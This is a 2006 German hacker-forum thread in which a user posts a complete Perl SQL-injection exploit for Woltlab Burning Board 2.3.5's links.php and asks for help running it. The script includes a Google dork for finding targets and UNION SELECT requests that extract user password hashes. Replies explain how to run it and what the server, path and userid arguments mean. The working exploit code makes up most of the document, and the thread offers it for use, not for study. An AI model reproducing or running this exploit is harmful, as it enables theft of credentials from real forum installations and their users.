Hilfe mit Exploit

breaKdown.iNC · 26. Oktober 2006

Hallo,

also ich habe mir grade mal kurz die Regeln fürs Hacker Forum durchgelesen und ich glaube das es laut denen erlaubt ist, jemand zu fragen ob er so nett wäre mir nen Exploit zu kompilieren^^

... wär einer so nett?^^

Code:

#!/usr/bin/perl

use IO::Socket;

print q{
################################################################################
## ##
## Woltlab Burning Board 2.3.5 <= "links.php" SQL Injection Exploit ##
## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##
## Exploit by | hias ##
## Googledork | inurl:/wbb2/links.php?cat ##
## Usage | links.pl [server] [path] [userid] ##
## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##
## ##
################################################################################

};

$webpage = $ARGV[0];
$directory = $ARGV[1];
$userid = $ARGV[2];

if (!$webpage||!$directory) { die "[+] Exploit failed\n"; }

$wbb_dir = 
"http://".$webpage.$directory."links.php?cat=5474902010+union+select+password,username+from+bb1_users+where+userid=$userid";

$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$webpage", 
PeerPort=>"80") || die "[+] Can't connect to Server\n";
print "[+] Exploiting.....\n";
print $sock "GET $wbb_dir HTTP/1.1\n";
print $sock "Accept: */*\n";
print $sock "User-Agent: Hacker\n";
print $sock "Host: $webpage\n";
print $sock "Connection: close\n\n";

while ($answer = <$sock>) {
if ($answer =~ 
/(................................)<\/span><\/b><\/font>/) {
print "[+] Hash: $1\n";
exit();
}
if ($answer =~ /SQL-DATABASE ERROR/) {
break;
}
}

$wbb_dir = 
"http://".$webpage.$directory."links.php?cat=5474902010+union+select+password,userid+from+bb1_users+where+userid=$userid";
close($sock);

$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$webpage", 
PeerPort=>"80") || die "[+] Can't connect to Server\n";
print $sock "GET $wbb_dir HTTP/1.1\n";
print $sock "Accept: */*\n";
print $sock "User-Agent: Hacker\n";
print $sock "Host: $webpage\n";
print $sock "Connection: close\n\n";

while ($answer = <$sock>) {
if ($answer =~ 
/(................................)<\/span><\/b><\/font>/) {
print "[+] Hash: $1\n";
exit();
}
if ($answer =~ /SQL-DATABASE ERROR/) {
print "[+] Database doesn't exist. try replacing bb1_users with bb2_users or bb3_users\n";
break;
}
}
close($sock);

print "[+] Exploit failed\n";


# bb-pcsecurity.de - always be up to date

wenns nciht erlaubt ist, bitte sagen, dann is die geschichte hier zu!

thx im voraus!

Anzeige

Fallen Angel · 26. Oktober 2006

AW: Hilfe mit Exploit

Das einzige was du machen musst, ist den Text in eine Datei (z.B. exploit.pl) zu packen, und es mit einem Perl-Interpreter zu starten

breaKdown.iNC · 26. Oktober 2006

AW: Hilfe mit Exploit

Ok, das krieg ich bestimmt auc noch hin....wie siehts denn aus mit dem Usage, das rall ich nciht wirklich:

Usage | links.pl [server] [path] [userid]

was mussn bei Server rein? Die IP? Und bei Path? Und bei UserID?...rall ich nicht, muss das aber unbedingt wissen^^

thx im voraus!

N0S · 26. Oktober 2006

AW: Hilfe mit Exploit

schau dir das doch mal genauer an:

Code:

"http://".$webpage.$directory."links.php?cat=5474902010+union+select+password,userid+from+bb1_users+where+userid=$userid";

deine userid hier im board ist 2882....

Diese Hilfe sollte reichen.... schritt für schritt anleitung gibt es nicht...

*closed

Nützliche Suchen

Hilfe mit Exploit

Videos zum Themenbereich